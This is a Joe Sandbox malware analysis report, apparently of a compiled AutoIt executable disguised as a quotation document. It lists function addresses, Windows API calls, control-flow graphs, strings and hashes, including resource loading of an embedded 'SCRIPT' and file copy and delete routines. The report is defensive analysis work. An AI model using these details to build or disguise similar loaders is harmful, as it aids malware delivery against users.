                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%
                                                                      • API String ID: 529118366-3343222573
                                                                      • Opcode ID: ab9bca16b7f7a9124ecc58a84b4fc86a989f8c12de5208548056a4ba6006285f
                                                                      • Instruction ID: 9fda29f55d59d5a8b82ce0e6c99499a0894d2a763eaaca82c67fb3878b361560
                                                                      • Opcode Fuzzy Hash: ab9bca16b7f7a9124ecc58a84b4fc86a989f8c12de5208548056a4ba6006285f
                                                                      • Instruction Fuzzy Hash: 2A510A71D08208AEDB05EBB5DC45EEEBBF8AB45704F106069F451B21F1CA7166CACB20
                                                                      Function 00E049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1039 e049a0-e04a00 call e07667 GetVersionExW call e07bcc 1044 e04a06 1039->1044 1045 e04b0b-e04b0d 1039->1045 1047 e04a09-e04a0e 1044->1047 1046 e3d767-e3d773 1045->1046 1048 e3d774-e3d778 1046->1048 1049 e04b12-e04b13 1047->1049 1050 e04a14 1047->1050 1052 e3d77b-e3d787 1048->1052 1053 e3d77a 1048->1053 1051 e04a15-e04a4c call e07d2c call e07726 1049->1051 1050->1051 1061 e04a52-e04a53 1051->1061 1062 e3d864-e3d867 1051->1062 1052->1048 1055 e3d789-e3d78e 1052->1055 1053->1052 1055->1047 1057 e3d794-e3d79b 1055->1057 1057->1046 1059 e3d79d 1057->1059 1063 e3d7a2-e3d7a5 1059->1063 1061->1063 1064 e04a59-e04a64 1061->1064 1065 e3d880-e3d884 1062->1065 1066 e3d869 1062->1066 1067 e04a93-e04aaa GetCurrentProcess IsWow64Process 1063->1067 1068 e3d7ab-e3d7c9 1063->1068 1069 e3d7ea-e3d7f0 1064->1069 1070 e04a6a-e04a6c 1064->1070 1073 e3d886-e3d88f 1065->1073 1074 e3d86f-e3d878 1065->1074 1071 e3d86c 1066->1071 1075 e04aac 1067->1075 1076 e04aaf-e04ac0 1067->1076 1068->1067 1072 e3d7cf-e3d7d5 1068->1072 1081 e3d7f2-e3d7f5 1069->1081 1082 e3d7fa-e3d800 1069->1082 1077 e04a72-e04a75 1070->1077 1078 e3d805-e3d811 1070->1078 1071->1074 1079 e3d7d7-e3d7da 1072->1079 1080 e3d7df-e3d7e5 1072->1080 1073->1071 1083 e3d891-e3d894 1073->1083 1074->1065 1075->1076 1084 e04ac2-e04ad2 call e04b37 1076->1084 1085 e04b2b-e04b35 GetSystemInfo 1076->1085 1086 e3d831-e3d834 1077->1086 1087 e04a7b-e04a8a 1077->1087 1089 e3d813-e3d816 1078->1089 1090 e3d81b-e3d821 1078->1090 1079->1067 1080->1067 1081->1067 1082->1067 1083->1074 1096 e04ad4-e04ae1 call e04b37 1084->1096 1097 e04b1f-e04b29 GetSystemInfo 1084->1097 1088 e04af8-e04b08 1085->1088 1086->1067 1093 e3d83a-e3d84f 1086->1093 1094 e04a90 1087->1094 1095 e3d826-e3d82c 1087->1095 1089->1067 1090->1067 1098 e3d851-e3d854 1093->1098 1099 e3d859-e3d85f 1093->1099 1094->1067 1095->1067 1104 e04ae3-e04ae7 GetNativeSystemInfo 1096->1104 1105 e04b18-e04b1d 1096->1105 1101 e04ae9-e04aed 1097->1101 1098->1067 1099->1067 1101->1088 1103 e04aef-e04af2 FreeLibrary 1101->1103 1103->1088 1104->1101 1105->1104
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00E049CD
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • GetCurrentProcess.KERNEL32(?,00E8FAEC,00000000,00000000,?), ref: 00E04A9A
                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00E04AA1
                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E04AE7
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E04AF2
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00E04B23
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00E04B2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                      • String ID:
                                                                      • API String ID: 1986165174-0
                                                                      • Opcode ID: 4be6b7e2efe9ef81aa0acaffa2d6740cfad10fc54b9c1ea19405e4e437119f7e
                                                                      • Instruction ID: 5b000cb40289bb3c9cbb993d025fafe3ff17d309928bec463a3aee695790250f
                                                                      • Opcode Fuzzy Hash: 4be6b7e2efe9ef81aa0acaffa2d6740cfad10fc54b9c1ea19405e4e437119f7e
                                                                      • Instruction Fuzzy Hash: 859127B198D7C0DECB31CB7895541AAFFF4AF29300F44599ED1CBA3A81D220B948C719
                                                                      Function 00E04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1106 e04e89-e04ea1 CreateStreamOnHGlobal 1107 e04ec1-e04ec6 1106->1107 1108 e04ea3-e04eba FindResourceExW 1106->1108 1109 e3d933-e3d942 LoadResource 1108->1109 1110 e04ec0 1108->1110 1109->1110 1111 e3d948-e3d956 SizeofResource 1109->1111 1110->1107 1111->1110 1112 e3d95c-e3d967 LockResource 1111->1112 1112->1110 1113 e3d96d-e3d975 1112->1113 1114 e3d979-e3d98b 1113->1114 1114->1110
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E04D8E,?,?,00000000,00000000), ref: 00E04E99
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E04D8E,?,?,00000000,00000000), ref: 00E04EB0
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F), ref: 00E3D937
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F), ref: 00E3D94C
                                                                      • LockResource.KERNEL32(00E04D8E,?,?,00E04D8E,?,?,00000000,00000000,?,?,?,?,?,?,00E04E2F,00000000), ref: 00E3D95F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 9c29fecc5c056a30085d587a1c4dca79500c597e4f3e09c548ac4847634730eb
                                                                      • Instruction ID: c32002b434ba44d1dcd274f2dfb435c10d939bd8c6624687f188e18c71cd5303
                                                                      • Opcode Fuzzy Hash: 9c29fecc5c056a30085d587a1c4dca79500c597e4f3e09c548ac4847634730eb
                                                                      • Instruction Fuzzy Hash: 0A1151B5240700BFD7258B65ED48F677BB9FBC5711F104268F509EA1A0DB61E8458660
                                                                      Function 00E0FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: pb$%
                                                                      • API String ID: 3964851224-1798441486
                                                                      • Opcode ID: 978f043bd97828ea560723f9c6d3cdf03ec276732531e9d6f05ec6f5d74d9584
                                                                      • Instruction ID: 34f648ea102df307e8953346ccc595ed701d003dcac16529b39940f65a1568a9
                                                                      • Opcode Fuzzy Hash: 978f043bd97828ea560723f9c6d3cdf03ec276732531e9d6f05ec6f5d74d9584
                                                                      • Instruction Fuzzy Hash: 24927E70604341DFD724DF14C480BAAB7E1BF89304F14A96DE89AAB392D775EC85CB92
                                                                      Function 00E0E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                                                                      • API String ID: 0-2781164977
                                                                      • Opcode ID: b030ef4b4ca75744a83e2a92c5def487e47124c763f0942b07ea833d80a64a6a
                                                                      • Instruction ID: d66a42e429a2f31a9bdaaa613909c982cfdb0af42146da5fc641361f3f7bca53
                                                                      • Opcode Fuzzy Hash: b030ef4b4ca75744a83e2a92c5def487e47124c763f0942b07ea833d80a64a6a
                                                                      • Instruction Fuzzy Hash: E7A27D75A00205CFCB28CF54D480AAAB7F2FF58314F689869E955BB391D731ED82CB91
                                                                      Function 00E6445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00E3E398), ref: 00E6446A
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00E6447B
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6448B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
                                                                      • Instruction ID: 95154051f1d591a31771108aee8c3dfd4df47aadc882e1c892f62fde3936e819
                                                                      • Opcode Fuzzy Hash: 7fcbc5f754eb5cc986599f4f64a450cbb87c6a02824a56bf0b52694421190e51
                                                                      • Instruction Fuzzy Hash: 2AE0D8724109006F42106B38FC0E4E9775C9F45375F100715F839E10E0EB7499049695
                                                                      Function 00E109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10A5B
                                                                      • timeGetTime.WINMM ref: 00E10D16
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E10E53
                                                                      • Sleep.KERNEL32(0000000A), ref: 00E10E61
                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00E10EFA
                                                                      • DestroyWindow.USER32 ref: 00E10F06
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E10F20
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00E44E83
                                                                      • TranslateMessage.USER32(?), ref: 00E45C60
                                                                      • DispatchMessageW.USER32(?), ref: 00E45C6E
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E45C82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                                                                      • API String ID: 4212290369-1420604165
                                                                      • Opcode ID: c37bcc815423b8708a9f50986d67149b253e2180f8c6a6ff5244e28b02029fdd
                                                                      • Instruction ID: b1309267243e80ca16d80610b5b9b92da2ef1110d7e5d822ba95adc9210452e8
                                                                      • Opcode Fuzzy Hash: c37bcc815423b8708a9f50986d67149b253e2180f8c6a6ff5244e28b02029fdd
                                                                      • Instruction Fuzzy Hash: A7B2C471608741DFD728DF24D884BAAB7E4BF84304F14591DE59AB72A2CB71E8C5CB82
                                                                      Function 00E69155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00E68F5F: __time64.LIBCMT ref: 00E68F69
                                                                        • Part of subcall function 00E04EE5: _fseek.LIBCMT ref: 00E04EFD
                                                                      • __wsplitpath.LIBCMT ref: 00E69234
                                                                        • Part of subcall function 00E240FB: __wsplitpath_helper.LIBCMT ref: 00E2413B
                                                                      • _wcscpy.LIBCMT ref: 00E69247
                                                                      • _wcscat.LIBCMT ref: 00E6925A
                                                                      • __wsplitpath.LIBCMT ref: 00E6927F
                                                                      • _wcscat.LIBCMT ref: 00E69295
                                                                      • _wcscat.LIBCMT ref: 00E692A8
                                                                        • Part of subcall function 00E68FA5: _memmove.LIBCMT ref: 00E68FDE
                                                                        • Part of subcall function 00E68FA5: _memmove.LIBCMT ref: 00E68FED
                                                                      • _wcscmp.LIBCMT ref: 00E691EF
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69824
                                                                        • Part of subcall function 00E69734: _wcscmp.LIBCMT ref: 00E69837
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E69452
                                                                      • _wcsncpy.LIBCMT ref: 00E694C5
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 00E694FB
                                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E69511
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69522
                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69534
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                      • String ID:
                                                                      • API String ID: 1500180987-0
                                                                      • Opcode ID: b749fd3d62a16f5f64a25303144bbc756377020772ddf595baece669e26c939c
                                                                      • Instruction ID: 429923671888fb6bcac87dd78e30a379128b4875f30a3385bf2202ff10097571
                                                                      • Opcode Fuzzy Hash: b749fd3d62a16f5f64a25303144bbc756377020772ddf595baece669e26c939c
                                                                      • Instruction Fuzzy Hash: 1CC15DB1D40229AACF11DF95DC81ADEB7BCEF45350F0050AAF609F7191DB309A848F61
                                                                      Function 00E0301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00E0309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00E030F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: a9de21c6c7edf63e5b27ea9d5548fa05846a18b9eaa864d5ca58b35c84c1f4bd
                                                                      • Instruction ID: 88ca76c1caa4446e10bf2500769895e72eee86f1b01b5be50248d94c9758a3bb
                                                                      • Opcode Fuzzy Hash: a9de21c6c7edf63e5b27ea9d5548fa05846a18b9eaa864d5ca58b35c84c1f4bd
                                                                      • Instruction Fuzzy Hash: A03169B2841309AFDB408FA5DC49ACDBBF4FB08310F10412AE544F62A0D3B6158ACF50
                                                                      Function 00E03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E03074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00E0309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E030AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E030CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E030DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00E030F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E03101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
                                                                      • Instruction ID: 332379660f03ebb88da2d8e1a8173bc027910bc3f0f738bd0383d308bed45fac
                                                                      • Opcode Fuzzy Hash: a4a7dd29229ba6af95f4c73a987a004b39f39684df8fab6403146250970e78c6
                                                                      • Instruction Fuzzy Hash: 1721F7B2911308AFEB00DFA6EC49B9DBBF4FB08700F10412AF515B62A0D7B255898F91
                                                                      Function 00E0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00E04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EC52F8,?,00E037AE,?), ref: 00E04724
                                                                        • Part of subcall function 00E2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E07165), ref: 00E2052D
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E071A8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E3E8C8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E3E909
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E3E947
                                                                      • _wcscat.LIBCMT ref: 00E3E9A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: 700cb078f416e1187fe014c8ce3c75d43dae66a0f4b228cca575d59b89027d07
                                                                      • Instruction ID: b35296fc397740bd9e557bc56e2578bda7facf8f9fe44b1a74f55c9f26d7c80d
                                                                      • Opcode Fuzzy Hash: 700cb078f416e1187fe014c8ce3c75d43dae66a0f4b228cca575d59b89027d07
                                                                      • Instruction Fuzzy Hash: 40716F715083019EC708EF66E841D9BBBE8FF85310F40692EF585B72B1DB729989CB52
                                                                      Function 00E03633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 762 e03633-e03681 764 e036e1-e036e3 762->764 765 e03683-e03686 762->765 764->765 766 e036e5 764->766 767 e036e7 765->767 768 e03688-e0368f 765->768 769 e036ca-e036d2 DefWindowProcW 766->769 770 e036ed-e036f0 767->770 771 e3d0cc-e3d0fa call e11070 call e11093 767->771 772 e03695-e0369a 768->772 773 e0374b-e03753 PostQuitMessage 768->773 775 e036d8-e036de 769->775 776 e036f2-e036f3 770->776 777 e03715-e0373c SetTimer RegisterWindowMessageW 770->777 805 e3d0ff-e3d106 771->805 779 e036a0-e036a2 772->779 780 e3d154-e3d168 call e62527 772->780 774 e03711-e03713 773->774 774->775 785 e036f9-e0370c KillTimer call e0443a call e03114 776->785 786 e3d06f-e3d072 776->786 777->774 781 e0373e-e03749 CreatePopupMenu 777->781 782 e03755-e0375f call e044a0 779->782 783 e036a8-e036ad 779->783 780->774 799 e3d16e 780->799 781->774 800 e03764 782->800 789 e036b3-e036b8 783->789 790 e3d139-e3d140 783->790 785->774 793 e3d074-e3d076 786->793 794 e3d0a8-e3d0c7 MoveWindow 786->794 797 e3d124-e3d134 call e62d36 789->797 798 e036be-e036c4 789->798 790->769 804 e3d146-e3d14f call e57c36 790->804 801 e3d097-e3d0a3 SetFocus 793->801 802 e3d078-e3d07b 793->802 794->774 797->774 798->769 798->805 799->769 800->774 801->774 802->798 806 e3d081-e3d092 call e11070 802->806 804->769 805->769 810 e3d10c-e3d11f call e0443a call e0434a 805->810 806->774 810->769
